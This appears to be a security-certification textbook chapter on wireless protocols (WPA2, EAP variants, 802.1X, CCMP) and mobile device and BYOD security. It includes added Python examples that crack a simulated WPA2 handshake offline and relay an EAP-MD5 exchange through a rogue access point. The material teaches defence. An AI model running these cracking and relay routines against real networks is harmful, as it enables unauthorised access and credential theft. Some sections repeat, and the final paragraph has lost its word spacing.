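How the WPA2-Personal network security key is actually used, as an added example that is not part of the book: the passphrase is stretched into the pairwise master key with PBKDF2-HMAC-SHA1 (salt = SSID, 4096 iterations) as IEEE 802.11i specifies, the four-way handshake derives session keys from it, and message 2 is authenticated with a MIC that an eavesdropper can recompute per candidate passphrase. The MAC addresses, nonces, EAPOL frame bytes, SSID and wordlist are constructed for the example, and the handshake is simulated in-process rather than captured.

```python
"""Added example, not from the book: what the WPA2-Personal network security
key turns into, and why its strength matters. Per IEEE 802.11i the passphrase
is stretched into a 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1 (salt =
SSID, 4096 iterations); the four-way handshake then derives per-session keys
from the PMK, two MAC addresses and two nonces, and authenticates EAPOL
message 2 with a MIC under the key confirmation key. Everything an attacker
needs to recompute that MIC (SSID, MACs, nonces, the frame) is sent in the
clear, so a captured handshake allows offline guessing at 4096 HMACs per
candidate. MAC addresses, nonces, the EAPOL frame bytes and the wordlist are
constructed; the handshake is simulated in-process, not captured."""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key; its first 16 bytes are the KCK used for the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key descriptor version 2: HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def simulate_handshake(passphrase: str, ssid: str) -> Dict[str, bytes]:
    """Return what a sniffer would see of message 2 of the four-way handshake."""
    aa = bytes.fromhex("0a1b2c3d4e5f")   # constructed AP MAC
    spa = bytes.fromhex("0c1d2e3f4a5b")  # constructed station MAC
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # Constructed placeholder for the EAPOL-Key message 2 body with MIC zeroed.
    frame = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 24 + snonce + b"\x00" * 16
    ptk = derive_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    return {"ssid": ssid.encode(), "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "frame": frame, "mic": eapol_mic(ptk[:16], frame)}


def crack_handshake(cap: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate passphrase."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, cap["ssid"].decode())
        ptk = derive_ptk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], cap["frame"]), cap["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = simulate_handshake("correct horse battery", "CorpGuest")   # constructed
    wordlist = ["password", "letmein123", "correct horse battery"]  # constructed
    print(crack_handshake(cap, wordlist))
```

`wpa2_pmk("password", "IEEE")` reproduces the 802.11i test vector, which is a useful sanity check for any implementation. The 4096 iterations slow each guess, but a passphrase from a wordlist still falls; a long random passphrase or WPA2-Enterprise is the fix, not a longer SSID.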
EAP
Extensible Authentication Protocol (EAP) is defined in RFC 2284 (obsoleted by RFC 3748). EAP-TLS relies on Transport Layer Security (TLS), the standardized successor to SSL, to pass credentials, authenticating both sides with X.509 certificates. EAP-TTLS (the acronym stands for EAP–Tunneled TLS protocol) is a variant of the EAP-TLS protocol. EAP-TTLS works much the same way as EAP-TLS, with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), MS-CHAP, or MS-CHAP-V2.

LEAP
Cisco designed a proprietary EAP known as Lightweight Extensible Authentication Protocol (LEAP); however, this is being phased out for newer protocols such as PEAP or EAP-TLS. Susceptible to offline password guessing, and with tools available that actively break LEAP security, this protocol has been deprecated in favor of stronger methods of EAP.

PEAP
PEAP, or Protected EAP, was developed to protect the EAP communication by encapsulating it with TLS. This is an open standard developed jointly by Cisco, Microsoft, and RSA. EAP was designed assuming a secure communication channel. PEAP provides that protection as part of the protocol via a TLS tunnel. PEAP is widely supported by vendors for use over wireless networks. Because only the server presents a certificate, the protection depends on clients validating it: a client configured to accept any server certificate will build its tunnel to a rogue AP and hand over the inner credentials.
Implementing 802.1X
The IEEE 802.1X protocol can support a wide variety of authentication methods and also fits well into existing authentication systems such as RADIUS and LDAP. This allows 802.1X to interoperate well with other systems such as VPNs and dial-up RAS. Unlike other authentication methods, such as the Point-to-Point Protocol over Ethernet (PPPoE), 802.1X does not wrap the session in PPP; it carries EAP directly in Ethernet frames (EAPOL), so the network overhead is much lower. Unfortunately, the protocol is just a framework for providing implementation, so nothing in it by itself guarantees strong authentication or key management; those properties come from the EAP method chosen. Implementations of the protocol vary from vendor to vendor in method of implementation and strength of security, especially when it comes to the difficult test of wireless security. Three common methods are used to implement 802.1X: EAP-TLS, EAP-TTLS, and EAP-MD5.

EAP-TLS relies on TLS, the standardized successor to SSL, to pass credentials. The standard, written by Microsoft authors as RFC 2716 (revised in RFC 5216), uses X.509 certificates on both sides and offers dynamic key generation: per-user, per-session WEP keys in the original deployments, and the pairwise master key for WPA/WPA2 today. This means that the organization must have the ability to support a public key infrastructure (PKI) in the form of X.509 digital certificates, including one for every client. Per-user, per-session dynamically generated keys help prevent anyone from cracking the keys in use, as each user individually has her own key. Even if a user were logged onto the AP and transmitted enough traffic to allow cracking of her WEP key, access would be gained only to that user's traffic. No other user's data would be compromised, and the attacker could not use the key to connect to the AP. This standard authenticates the client to the AP, but it also authenticates the AP to the client, helping to avoid man-in-the-middle attacks. The main problem with EAP-TLS is operational rather than cryptographic: every client needs its own certificate, so issuance, renewal and revocation have to be managed for the whole fleet. (Any standards-compliant certificate authority can issue those certificates; EAP-TLS is not tied to Microsoft Active Directory or Certificate Services, though in a mixed environment the clients and the RADIUS server must be configured to trust the same CA.) As discussed earlier, EAP-TTLS works much the same way as EAP-TLS, with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), MS-CHAP, or MS-CHAP-V2. This makes the protocol more versatile while still supporting the enhanced security features such as dynamic key assignment.

EAP-MD5, while it does improve the authentication of the client to the AP, does little else to improve the security of your AP. The protocol is a CHAP-style challenge-response: the authenticator sends a random challenge, and the client replies with the MD5 hash of the message identifier, the user's password, and the challenge (MD5 is a hash function, not an encryption algorithm, so nothing in the exchange is encrypted). This protocol, unfortunately, provides no way for the AP to authenticate to the client, and it produces no keying material, so it cannot provide dynamic key assignment; and because the challenge and response are sent in the clear, an eavesdropper can guess the password offline. In the wireless environment, without strong two-way authentication, it is very easy for an attacker to perform a man-in-the-middle attack. Normally, these types of attacks are difficult to perform, requiring a traffic redirect of some kind, but wireless changes all those rules. By setting up a rogue AP, an attacker can attempt to get clients to connect to it as if it were authorized and then simply authenticate to the real AP, a simple way to have access to the network and the client's credentials. The problem of not dynamically generating keys is that it simply opens up the network to the same lack of confidentiality to which a normal AP is vulnerable. An attacker has to wait only for enough traffic to crack the WEP key, and he can then observe all traffic passing through the network.

Because the security of wireless LANs has been so problematic, many users have simply switched to a layered security approach, that is, they have moved their APs to untrustworthy portions of the network and have forced all clients to authenticate through the firewall to a third-party VPN system. The additional security comes at a price of putting more load on the firewall and VPN infrastructure and possibly adding cumbersome software to the users' devices. While wireless can be set up in a very secure manner in this fashion, it can also be set up poorly. Some systems lack strong authentication of both endpoints, leading to possibilities of a man-in-the-middle attack. Also, even though the data is tunneled through, IP addresses are still sent in the clear, giving an attacker information about what and where your VPN endpoint is.

Another phenomenon of wireless is borne out of its wide availability and low price. All the security measures of the wired and wireless network can be defeated by the rogue AP. This is the third possible type of rogue access point discussed in this chapter; they all share the same name as they all represent a security breach. However, since they are implemented with different motives and accordingly pose slightly different threats, we discuss them all separately. In this case, a well-intentioned employee who is trying to make the work environment more convenient purchases an AP at a local retailer and installs it. When installed, it works fine, but it typically will have no security installed. Since the IT department doesn't know about it, it is an uncontrolled entry point into the network.

No matter what kind of rogue AP we are dealing with, the rogue AP must be detected and controlled. The most common way to control rogue APs is some form of wireless scanning to ensure only legitimate wireless is in place at an organization. While complete wireless IDSs will detect APs, this can also be done with a laptop and free software.
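The two EAP-MD5 weaknesses discussed above (offline password guessing from a sniffed exchange, and a rogue AP relaying the challenge because nothing authenticates the network to the client), as an added example that is not part of the book. The response formula follows RFC 3748 (MD5-Challenge, inherited from CHAP in RFC 1994); `Authenticator`, `Supplicant`, `rogue_ap_relay`, the user "alice", her password and the wordlist are this example's own constructions, and the whole exchange runs in-process.

```python
"""Added example, not from the book: what the EAP-MD5 exchange above gives an
eavesdropper and a rogue AP. Per RFC 3748 (MD5-Challenge, built on CHAP from
RFC 1994) the response is MD5(Identifier || password || challenge). Challenge
and response cross the air unprotected, nothing authenticates the AP to the
client, and no keying material is produced. Authenticator and Supplicant are
constructed stand-ins for the RADIUS-backed AP and the client; identities,
password and wordlist are constructed."""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional, Tuple


def eap_md5_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """RFC 3748 section 5.4: Response = MD5(Identifier || Secret || Challenge)."""
    return hashlib.md5(bytes([identifier & 0xFF]) + password + challenge).digest()


class Authenticator:
    """AP plus RADIUS server holding the user database."""

    def __init__(self, users: Dict[str, bytes]):
        self.users = users
        self.pending: Dict[str, Tuple[int, bytes]] = {}

    def issue_challenge(self, identity: str) -> Tuple[int, bytes]:
        ident, challenge = os.urandom(1)[0], os.urandom(16)
        self.pending[identity] = (ident, challenge)
        return ident, challenge

    def verify(self, identity: str, response: bytes) -> bool:
        ident, challenge = self.pending.pop(identity)
        expected = eap_md5_response(ident, self.users[identity], challenge)
        return hmac.compare_digest(expected, response)


class Supplicant:
    """Client. It answers any challenge it is handed: EAP-MD5 gives it no way
    to tell a legitimate AP from a rogue one."""

    def __init__(self, identity: str, password: bytes):
        self.identity, self.password = identity, password

    def answer(self, ident: int, challenge: bytes) -> bytes:
        return eap_md5_response(ident, self.password, challenge)


def offline_guess(ident: int, challenge: bytes, response: bytes,
                  wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Eavesdropper: one MD5 per candidate, no interaction with the network."""
    for word in wordlist:
        if eap_md5_response(ident, word, challenge) == response:
            return word
    return None


def rogue_ap_relay(real: Authenticator, victim: Supplicant) -> Tuple[bool, Dict[str, object]]:
    """Man in the middle: the rogue AP opens a session with the real network as
    the victim, relays the challenge to the victim, relays the answer back, and
    ends up authenticated while keeping a transcript for offline guessing."""
    ident, challenge = real.issue_challenge(victim.identity)   # rogue -> real AP
    response = victim.answer(ident, challenge)                 # rogue -> victim -> rogue
    authenticated = real.verify(victim.identity, response)     # rogue -> real AP
    return authenticated, {"ident": ident, "challenge": challenge, "response": response}


if __name__ == "__main__":
    network = Authenticator({"alice": b"Summer2016"})   # constructed user database
    alice = Supplicant("alice", b"Summer2016")
    ok, transcript = rogue_ap_relay(network, alice)
    print("rogue AP accepted as alice:", ok)
    print("password from sniffed transcript:",
          offline_guess(transcript["ident"], transcript["challenge"],
                        transcript["response"], [b"password", b"Summer2016"]))
```

Contrast this with EAP-TLS or PEAP: there the server proves its identity with a certificate before any client secret is used, and the method exports keying material that the AP and client turn into per-session link keys, which is exactly what EAP-MD5 cannot do.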
Try This!
Scanning for Rogue Wireless
Once you have completed Lab Project 12.1 and have NetStumbler or Kismet installed on the computer, take it to several locations around your workplace or school and attempt to scan for wireless access points that should not be there.

CCMP
As previously mentioned in the discussion of WPA2, CCMP stands for Counter Mode with Cipher Block Chaining–Message Authentication Code Protocol (or Counter Mode with CBC-MAC Protocol). CCMP is a data encapsulation encryption mechanism designed for wireless use. CCMP is the mode in which the AES cipher is used to provide both confidentiality and message integrity: the frame body is encrypted with AES in counter mode, and a CBC-MAC computed over the protected header fields and the body yields the message integrity code appended to the frame, so tampering with either is detected. Unlike TKIP, CCMP generally required new hardware to perform the AES encryption.
MAC Filtering
MAC filtering is the selective admission of packets based on a list of approved Media Access Control (MAC) addresses. Employed on switches and access points, this method is used to provide a means of machine authentication. In wired networks, this enjoys the protection afforded by the wires, making interception of signals to determine their MAC addresses difficult. In wireless networks, this same mechanism suffers from the fact that an attacker can see the MAC addresses of all traffic to and from the access point (802.11 frame headers are never encrypted, even on a WPA2 network), and then can spoof the MAC addresses that are permitted to communicate via the access point.

Exam Tip: MAC filtering can be employed on wireless access points, but can be bypassed by attackers observing allowed MAC addresses and spoofing the allowed MAC address for the wireless card.
Wireless Systems Configuration
Wireless systems are more than just protocols. Putting up a functional wireless system in a house is as easy as plugging in a wireless access point and connecting. But in an enterprise, where multiple access points will be needed, the configuration takes significantly more work. Site surveys are needed to determine proper access point and antenna placement, as well as channels and power levels.

Antenna Types
The standard access point is equipped with an omnidirectional antenna. Omnidirectional antennas operate in all directions, making the relative orientation between devices less important. Omnidirectional antennas cover the greatest area per antenna. The weakness occurs in corners and hard-to-reach areas, as well as boundaries of a facility where directional antennas are needed to complete coverage. Figure 12.7 shows a sampling of common Wi-Fi antennas: (a) is a common home wireless router, (b) is a commercial indoor wireless access point, and (c) is an outdoor directional antenna. These can be visible as shown, or hidden above ceiling tiles.

• Figure 12.7 Wireless access point antennas

Wireless networking problems caused by weak signal strength can sometimes be solved by installing upgraded Wi-Fi radio antennas on the access points. On business networks, the complexity of multiple access points typically requires a comprehensive site survey to map the Wi-Fi signal strength in and around office buildings. Additional wireless access points can then be strategically placed where needed to resolve dead spots in coverage. For small businesses and homes, where a single access point may be all that is needed, an antenna upgrade may be a simpler and more cost-effective option to fix Wi-Fi signal problems. Two common forms of upgraded antennas are the Yagi antenna and the panel antenna. An example of a Yagi antenna is shown in Figure 12.7(c). Both Yagi and panel antennas are directional in nature, spreading the RF energy in a more limited field, increasing effective range in one direction while limiting it in others. Panel antennas can provide solid room performance while preventing signal bleed behind the antennas. This works well on the edge of a site, limiting the stray emissions that could be captured off site. Yagi antennas act more like a rifle, funneling the energy along a beam. This allows much longer communication distances using standard power. This also enables eavesdroppers to capture signals from much greater distances because of the gain provided by the antenna itself; an attacker's own high-gain antenna extends the reach of your network in the same way, so the power level you set does not by itself define how far away the network can be heard.

Antenna Placement
Wi-Fi is by nature a radio-based method of communication, and as such uses antennas to transmit and receive the signals. The actual design and placement of the antennas can have a significant effect on the usability of the radio frequency (RF) medium for carrying the traffic. Antennas come in a variety of types, each with its own transmission pattern and gain factor. High-gain antennas can deal with weaker signals, but also have more-limited coverage. Wide-coverage, omnidirectional antennas can cover wider areas, but at lower levels of gain. The objective of antenna placement is to maximize the coverage over a physical area and reduce low-gain areas. This can be very complex in buildings with walls, electrical interference, and other sources of interference and frequently requires a site survey to determine proper placement.

Exam Tip: Because wireless antennas can transmit outside a facility, tuning and placement of antennas can be crucial for security. Adjusting radiated power through the power level controls will assist in keeping wireless signals from being broadcast outside areas under physical access control.
MIMO
MIMO (multiple-input, multiple-output) is a set of antenna technologies in which both the transmitter and the receiver use several antennas at the same time. The radios can send independent spatial streams over the same channel simultaneously (spatial multiplexing) or combine the signals received on several antennas to improve reliability, which enhances the usable bandwidth and data transmission capacity between the access point and user. Wi-Fi adopted MIMO with 802.11n, there are a wide variety of MIMO methods, and this technology, once considered cutting edge or advanced, has become mainstream.

Power Level Controls
Wi-Fi power levels can be controlled by the hardware for a variety of reasons. The lower the power used, the less the opportunity for interference. But if the power levels are too low, then signal strength limits range. Access points can have the power level set either manually or via programmatic control. For most users, power level controls are not very useful, and leaving the unit in default mode is the best option. In complex enterprise setups, with site surveys and planned overlapping zones, this aspect of signal control can be used to increase capacity and control on the network.

Site Surveys
When developing a coverage map for a complex building site, you need to take into account a wide variety of factors, particularly walls, interfering sources, and floor plans. A site survey involves several steps: mapping the floor plan, testing for RF interference, testing for RF coverage, and analysis of material via software. The software can suggest placement of access points. After deploying the APs, the site is surveyed again, mapping the results versus the predicted, watching signal strength and signal-to-noise ratios. Figure 12.8 illustrates what a site survey looks like. The different shades indicate signal strength, showing where reception is strong and where it is weak. Site surveys can be used to ensure availability of wireless, especially when it's critical for users to have connections.

• Figure 12.8 Example site survey

Exam Tip: Wireless networks are dependent upon radio signals to function. It is important to understand that antenna type, placement, and site surveys are used to ensure proper coverage of a site, including areas blocked by walls, interfering signals, and echoes.
Captive Portals
Captive portal refers to a specific technique of using an HTTP client to handle authentication on a wireless network. Frequently employed in public hotspots, a captive portal opens a web browser to an authentication page. This occurs before the user is granted admission to the network. The access point uses this simple mechanism by intercepting all packets and returning the web page for login. The actual web server that serves up the authentication page can be in a walled-off section of the network, blocking access to the Internet until the user successfully authenticates. A captive portal controls admission, not confidentiality: once a client is through, its traffic is only as protected as the link-layer encryption in use, and on an open network that is none.

Securing Public Wi-Fi
Public Wi-Fi is a common perk that some firms provide for their customers and visitors. When providing a Wi-Fi hotspot, even free open-to-the-public Wi-Fi, security should still be a concern. One of the issues associated with wireless transmissions is that they are subject to interception by anyone within range of the hotspot. This makes it possible for others to intercept and read traffic of anyone using the hotspot, unless encryption is used. For this reason, it has become common practice to use wireless security, even when the intent is to open the channel for everyone. Having a default password, even one that everyone knows, raises the bar for casual observers, because each client's traffic is encrypted under keys derived during that client's own four-way handshake. It is not a complete defense: anyone who knows the passphrase and captures another client's handshake can derive that client's keys and decrypt its traffic. There is an entire open wireless movement, designed around a sharing concept that promotes sharing of the Internet to all. For information, check out https://openwireless.org.
Mobile Devices
This section will review a large number of topics specific to mobile devices. You'll likely find that the security principles you've already learned apply and just need to be adapted to mobile technologies. This is one of the fastest-changing areas of computer security because mobile technology is likely the fastest-changing technology.

Although the data transmissions between many mobile devices are secured via carrier methods (GSM) and device methods (RIM BlackBerry), voice transmissions have been intercepted and later used to embarrass the parties. Third-party voice encryption methods exist for smartphones, but are considered expensive and difficult to deploy by most people. They also suffer from the problem that both ends of a conversation need the device to have a secured communication. As more and more businesses find value in secured voice communications, this solution may become mainstream in the future.

Many mobile devices have significant storage capacity, allowing them to transfer files and data. Data must be protected, devices must be properly configured, and good user habits must be encouraged. This makes mobile devices no different from any other mobile media source, capable of carrying and delivering viruses, worms, and other forms of malware. They are also capable of removing data from within a network, in the case of an insider attack. Mobile devices are also commonly Bluetooth enabled, making various wireless attacks against the device a risk. One reason to attack the mobile device is to use it to relay the attack onto the internal network when the device is synced up. Bluetooth attacks are covered in Chapter 12.

Mobile Device Security
Security principles similar to those applicable to laptop computers must be followed when using mobile devices such as smartphones and tablet computing devices. Data must be protected, devices must be properly configured, and good user habits must be encouraged. This chapter will review a large number of topics specific to mobile devices. You'll likely find that the security principles you've already learned apply and just need to be adapted to mobile technologies. This is one of the fastest-changing areas of computer security because mobile technology is likely the fastest-changing technology.
Full Device Encryption
Just as laptop computers should be protected with whole disk encryption to protect the laptop in case of loss or theft, you may need to consider encryption for mobile devices used by your company's employees. Mobile devices are much more likely to be lost or stolen, so you should consider encrypting data on your devices. More and more, mobile devices are used when accessing and storing business-critical data or other sensitive information. Protecting the information on mobile devices is becoming a business imperative. This is an emerging technology, so you'll need to complete some rigorous market analysis to determine what commercial product meets your needs. Keep in mind that device encryption is only as strong as the passcode that unlocks it, which is why the screen-lock and lockout controls that follow matter.

Remote Wiping
Today's mobile devices are almost innumerable and are very susceptible to loss and theft. Further, it is unlikely that a lost or stolen device will be recovered, thus making even encrypted data stored on a device more vulnerable to decryption. If the thief can have your device for a long time, he can take all the time he wants to try to decrypt your data. Therefore, many companies prefer to just remotely wipe a lost or stolen device. Remote wiping a mobile device typically removes data stored on the device and resets the device to factory settings. There is a dilemma in the use of BYOD (bring your own device) devices that store both personal and enterprise data. Wiping the device usually removes all data, both personal and enterprise. Therefore, if corporate policy requires wiping a lost device, that may mean the device's user loses personal photos and data. The software controls for separate data containers, one for business and one for personal, are one of the reasons for enterprises to adopt mobile device management (MDM) solutions. A remote wipe can only reach a device that is powered on and connected to a network, so it complements encryption rather than replacing it.

Lockout
A user likely will discover in a relatively short time that they've lost their device, so a quick way to protect their device is to remotely lock the device as soon as they recognize it has been lost or stolen. Several products are available on the market today to help enterprises manage their devices. Remote lockout is usually the first step taken in securing a mobile device.

Screen-locks
Most corporate policies regarding mobile devices require the use of the mobile device's screen-locking capability. This usually consists of entering a passcode or PIN to unlock the device. It is highly recommended that screen locks be enforced for all mobile devices. Your policy regarding the quality of the passcode should be consistent with your corporate password policy. However, many companies merely enforce the use of screen-locking. Thus, users tend to use convenient or easy-to-remember passcodes. Some devices allow complex passcodes. As shown in Figure 12.9, the device screen on the left supports only a simple iOS passcode, limited to four numbers, while the device screen on the right supports a passcode of indeterminate length that can contain alphanumeric characters.

• Figure 12.9 iOS lock screens

Some more advanced forms of screen-locks work in conjunction with device wiping. If the passcode is entered incorrectly a specified number of times, the device is automatically wiped. This is one of the security features of BlackBerry that has traditionally made it of interest to security-conscious users. Apple has made this an option on newer iOS devices. Apple also allows remote locking of a device from the user's iCloud account.

Tech Tip
Mobile Device Security
Mobile devices require basic security mechanisms of screen-locks, lockouts, device wiping, and encryption to protect sensitive information contained on them.
GPS
Most mobile devices are now capable of using the Global Positioning System (GPS) for tracking device location. Many apps rely heavily on GPS location, such as device-locating services, mapping apps, traffic monitoring apps, and apps that locate nearby businesses such as gas stations and restaurants. Such technology can be exploited to track the movements of the mobile device. This tracking can be used to assist in the recovery of lost devices.

Storage Segmentation
On mobile devices, it can be very difficult to keep personal data separate from corporate data. Some companies have developed capabilities to create separate virtual containers to keep personal data separate from corporate data and applications. For devices that are used to handle highly sensitive corporate data, this form of protection is highly recommended.

Asset Control
Because each user can have multiple devices connecting to the corporate network, it is important to implement a viable asset tracking and inventory control mechanism. For security and liability reasons, the company needs to know what devices are connecting to its systems and what access has been granted. Just as in IT systems, maintaining a list of approved devices is a critical control.

Mobile Device Management
Mobile device management (MDM) is one of the hottest topics in device security today. MDM began as a marketing term for a collective set of commonly employed protection elements associated with mobile devices. When viewed as a comprehensive set of security options for mobile devices, every corporation should have and enforce an MDM policy. The policy should require

• Device locking with a strong password
• Encryption of data on the device
• Device locking automatically after a certain period of inactivity
• The capability to remotely lock the device if it is lost or stolen
• The capability to wipe the device automatically after a certain number of failed login attempts
• The capability to remotely wipe the device if it is lost or stolen

Password policies should extend to mobile devices, including lockout and, if possible, the automatic wiping of data. Corporate policy for data encryption on mobile devices should be consistent with the policy for data encryption on laptop computers. In other words, if you don't require encryption of portable computers, then should you require it for mobile devices? There is not a uniform answer to this question; mobile devices are much more mobile in practice than laptops, and more prone to loss. This is ultimately a risk question that management must address: What is the risk and what are the costs of the options employed? This also raises a bigger question: Which devices should have encryption as a basic security protection mechanism? Is it by device type, or by user based on what data would be exposed to risk? Fortunately, MDM solutions exist to make the choices manageable.

Exam Tip: Mobile device management (MDM) is a marketing term for a collective set of commonly employed protection elements associated with mobile devices.
Device Access Control
The principles of access control for mobile devices need to be managed just like access control from wired or wireless desktops and laptops. This will become more critical as storage in the cloud and Software as a Service (SaaS) become more prevalent. Emerging tablet/mobile device sharing intends to provide the user with a seamless data access experience across many devices. Data access capabilities will continue to evolve to meet this need. Rigorous data access principles need to be applied, and they become even more important with the inclusion of mobile devices as fully functional computing devices. When reviewing possible solutions, it is important to consider seeking proof of security and procedures rather than relying on marketing brochures.

Removable Storage
Because removable devices can move data outside of the corporate-controlled environment, their security needs must be addressed. Removable devices can bring unprotected or corrupted data into the corporate environment. All removable devices should be scanned by antivirus software upon connection to the corporate environment. Corporate policies should address the copying of data to removable devices. Many mobile devices can be connected via USB to a system and used to store data, and in some cases vast quantities of data. This capability can be used to avoid some implementations of data loss prevention mechanisms.

Disabling Unused Features
As with all computing devices, features that are not used or that present a security risk should be disabled. Bluetooth access is particularly problematic. It is best to make Bluetooth connections undiscoverable. But users will need to enable it to pair with a new headset or car connection, for example. Requiring Bluetooth connections to be undiscoverable is very hard to enforce but should be encouraged as a best practice. Users should receive training as to the risks of Bluetooth, not so they avoid Bluetooth, but so they understand when they should turn it off. Having a mobile device with access to sensitive information carries with it a level of responsibility. Helping users understand this and act accordingly can go a long way toward securing mobile devices.

BYOD Concerns
Permitting employees to "bring your own device" (BYOD) has many advantages in business, and not just from the perspective of device cost. Users tend to prefer having a single device rather than carrying multiple devices. Users have less of a learning curve on devices they already have an interest in learning.

Data Ownership
BYOD blurs the lines of data ownership because it blurs the lines of device management. If a company owns a smartphone issued to an employee, the company can repossess the phone upon employee termination. This practice may protect company data by keeping the company-issued devices in the hands of employees only. However, a company cannot rely on a simple factory reset before reissuing a device, because factory resetting may not remove all the data on the device. If a device is reissued, it is possible that some of the previous owner's personal information, such as private contacts, still remains on the device. On the other hand, if the employee's device is a personal device that has been used for business purposes, upon termination of the employee, it is likely that some company data remains on the phone despite the company's best efforts to remove its data from the device. If that device is resold or recycled, the company's data may remain on the device and be passed on to the subsequent owner. Keeping business data in separate, MDM-managed containers is one method of dealing with this issue.
Tech Tip
BYOD Concerns
There is a dilemma in the use of BYOD devices that store both personal and enterprise data. Wiping the device usually removes all data, both personal and enterprise. Therefore, if corporate policy requires wiping a lost device, that policy may mean the device's user loses personal photos and data. Software controls for separate data containers, one for business and one for personal, address this, and they are one of the reasons enterprises adopt MDM solutions.

Storage Segmentation
On mobile devices, it can be very difficult to keep personal data separate from corporate data. Some companies have developed capabilities to create separate virtual containers to keep personal data separate from corporate data and applications. For devices that are used to handle highly sensitive corporate data, this form of protection is highly recommended.

Support Ownership
Support costs for mobile devices are an important consideration for corporations. Each device has its own implementation of various functions. While those functions typically are implemented against a specification, software implementations may not fully or properly implement the specification. This may result in increased support calls to your help desk or support organization. It is very difficult for a corporate help desk to be knowledgeable on all aspects of all possible devices that access a corporate network. For example, your support organization must be able to troubleshoot iPhones, Android devices, tablets, and so forth. These devices are updated frequently, new devices are released, and new capabilities are added on a regular basis. Your support organization will need viable knowledge base articles and job aids in order to provide sufficient support for the wide variety of ever-changing devices.
Patch Management
Just as your corporate policy should enforce the prompt update of desktop and laptop computers to help eliminate security vulnerabilities on those platforms, it should also require mobile devices to be kept current with respect to patches. Having the latest applications, operating system, and so on is an important best defense against viruses, malware, and other threats. It is important to recognize that "jailbreaking" or "rooting" your device may remove the manufacturer's security mechanisms and protection against malware and other threats. These devices may also no longer be able to update their applications or OS against known issues. Jailbreaking or rooting is also a method used to bypass security measures associated with the device manufacturer control, and in some locations, this can be illegal. Mobile devices that are jailbroken or rooted should not be trusted on your enterprise network or allowed to access sensitive data.

Antivirus Management
Just like desktop and laptop computers, smartphones, tablets, and other mobile devices need protection against viruses and malware. It is important that corporate policy and personal usage keep operating systems and applications current. Antivirus and malware protection should be employed as widely as possible and kept up-to-date against current threats.

Forensics
Mobile device forensics is a rapidly evolving and fast-changing field. Because devices are evolving so quickly and changing so fast, it is difficult to stay current in this field. Solid forensics principles should always be followed. Devices should be properly handled by using RF-shielded bags or containers; a seized device that can still reach the network can receive a remote lock or wipe command while in evidence. Because of the rapid changes in this area, it's best to engage the help of trained forensic specialists to ensure data isn't contaminated and the device state and memory are unaltered. If forensics are needed on a device that has both personal and business data, then policies need to be in place to cover the appropriate privacy protections on the personal side of the device.

Privacy
When an employee uses his personal device to perform his work for the company, he may have strong expectations that privacy will be protected by the company. The company policy needs to consider this and address it explicitly. On company-owned devices, it's quite acceptable for the company to reserve the right to access and wipe any company data on the device. The company can thus state that the user can have no expectation of privacy when using a company device. But when the device is a personal device, the user may feel stronger ownership. Expectations of privacy and data access on personal devices should be included in your company policy.

On-board Camera/Video
Many mobile devices include on-board cameras, and the photos/videos they take can divulge information. This information can be associated with anything the camera can image: whiteboards, documents, even the location of the device when the photo/video was taken via geo-tagging. Another challenge presented by mobile devices is the possibility that they will be used for illegal purposes. This can create liability for the company if it is a company-owned device. Despite all the potential legal concerns, possibly the greatest concern of mobile device users is that their personal photos will be lost during a device wipe originated by the company.
On-boarding/Off-boardingMostcompaniesandindividualsfinditrelativelyeasytoconnectmobiledevicestothecorporatenetwork.OftentherearenotcontrolsaroundconnectingadeviceotherthanhavingaMicrosoftExchangeaccount.Whennewemployeesjoinacompany,theon-boardingprocessesneedtoincludeprovisionsformobiledeviceresponsibilities.Itiseasyfornewemployeestobypasssecuritymeasuresiftheyarenotpartofthebusinessprocessofon-boarding.Employeeterminationneedstobemodifiedtoincludeterminationof
accountsonmobiledevices.It’snotuncommontofindterminatedemployeeswithaccountsorevencompanydevicesstillconnectingtothecorporatenetworkmonthsafterbeingterminated.E-mailaccountsshouldberemovedpromptlyaspartoftheemployeeterminationpolicyandprocess.Mobiledevicessuppliedbythecompanyshouldbecollectedupontermination.BYODequipmentshouldhaveitsaccesstocorporateresourcesterminatedaspartoftheoff-boardingprocess.Regularauditsforoldorunterminatedaccountsshouldbeperformedtoensurepromptdeletionofaccountsforterminatedemployees.
